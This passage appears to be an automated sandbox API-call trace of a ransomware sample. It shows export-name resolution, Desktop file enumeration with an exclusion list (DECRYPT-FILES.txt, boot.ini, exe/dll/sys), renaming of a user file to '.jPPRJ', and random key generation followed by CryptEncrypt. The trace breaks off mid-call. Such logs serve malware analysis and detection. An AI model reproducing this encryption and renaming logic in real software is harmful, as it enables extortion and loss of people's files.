returned 15 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.982] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.982] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.983] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.983] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.983] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.983] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.983] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.983] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.983] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.983] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.983] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.983] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.983] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.983] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.983] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.983] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.983] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.983] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.983] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.983] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.983] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.983] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.984] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.984] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.984] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.984] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.984] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.984] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.984] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.984] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.984] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.984] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.984] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.984] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.984] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.984] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.984] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.984] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.984] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.984] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.984] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.985] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.985] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.985] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.985] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.985] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.985] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.985] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.985] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.985] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.985] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.985] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.985] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.985] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.985] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.985] lstrlenA (lpString="DELETEATOM") returned 10 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.985] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.985] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.985] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.985] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.985] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.986] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.986] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.986] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.986] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.986] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.986] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.986] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.986] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.986] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.986] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.986] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.986] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.986] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.986] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.986] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.986] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.986] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.986] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.986] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.987] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.987] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.987] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.987] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.987] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.987] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.987] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.987] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.987] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.987] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.987] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.987] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.987] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.987] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.987] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.987] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.987] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.987] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.987] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.988] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.988] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a") returned 53 [0082.988] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a.jPPRJ") returned 59 [0082.988] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\emb1rmdxzct.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a.jPPRJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\emb1rmdxzct.m4a.jpprj"), dwFlags=0x0) returned 1 [0082.989] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.989] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.989] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.989] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829a8000, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x83331680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x81695300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe53e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eset.exe", cAlternateFileName="")) returned 1 [0082.989] lstrcmpiW (lpString1="eset.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0082.989] lstrcmpiW (lpString1="eset.exe", lpString2="autorun.inf") returned 1 [0082.989] lstrcmpiW (lpString1="eset.exe", lpString2="boot.ini") returned 1 [0082.989] lstrcmpiW (lpString1="eset.exe", lpString2="desktop.ini") returned 1 [0082.989] lstrcmpiW (lpString1="eset.exe", lpString2="ntuser.dat") returned -1 [0082.990] lstrcmpiW (lpString1="eset.exe", lpString2="iconcache.db") returned -1 [0082.990] lstrcmpiW (lpString1="eset.exe", lpString2="bootsect.bak") returned 1 [0082.990] lstrcmpiW (lpString1="eset.exe", lpString2="ntuser.dat.log") returned -1 [0082.990] lstrcmpiW (lpString1="eset.exe", lpString2="thumbs.db") returned -1 [0082.990] lstrcmpiW (lpString1="eset.exe", lpString2="Bootfont.bin") returned 1 [0082.990] lstrlenW (lpString="eset.exe") returned 8 [0082.990] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0082.990] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0082.990] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34755610, ftCreationTime.dwHighDateTime=0x1d4c879, ftLastAccessTime.dwLowDateTime=0xff15f680, ftLastAccessTime.dwHighDateTime=0x1d4d379, ftLastWriteTime.dwLowDateTime=0xff15f680, ftLastWriteTime.dwHighDateTime=0x1d4d379, nFileSizeHigh=0x0, nFileSizeLow=0x557a, dwReserved0=0x0, dwReserved1=0x0, cFileName="fSI8D5g.pps", cAlternateFileName="")) returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="autorun.inf") returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="boot.ini") returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="desktop.ini") returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="ntuser.dat") returned -1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="iconcache.db") returned -1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="bootsect.bak") returned 1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="ntuser.dat.log") returned -1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="thumbs.db") returned -1 [0082.990] lstrcmpiW (lpString1="fSI8D5g.pps", lpString2="Bootfont.bin") returned 1 [0082.990] lstrlenW (lpString="fSI8D5g.pps") returned 11 [0082.990] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0082.990] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0082.990] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0082.990] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0082.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.990] lstrlenW (lpString="fSI8D5g.pps") returned 11 [0082.990] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="fSI8D5g.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps" [0082.990] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsi8d5g.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.991] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=21882) returned 1 [0082.991] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.991] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.991] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.991] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.991] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.991] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, 